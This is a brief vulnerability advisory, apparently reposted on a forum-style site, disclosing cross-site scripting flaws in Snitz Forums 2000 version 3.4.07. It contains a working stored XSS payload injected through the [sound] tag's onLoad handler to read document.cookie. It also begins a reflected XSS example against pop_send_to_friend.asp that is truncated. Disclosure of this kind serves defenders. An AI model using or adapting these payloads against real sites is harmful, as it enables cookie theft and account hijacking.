19 October 2009 - Be Secure

******************************

********************************
Application: Snitz Forums 2000
Version affected: 3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
**************************************************************

###### PERMANENT XSS
If [sound] tag is allowed:

[sound]http://url_to_valid_mp3_or_m3u_file.m3u"
onLoad="alert(document.cookie)[/sound]
######

###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp ... Read more »

Views: 13631 | Added by: apeh1706 | Date: 19 October 2009 | Comments (1)

Login:
Password: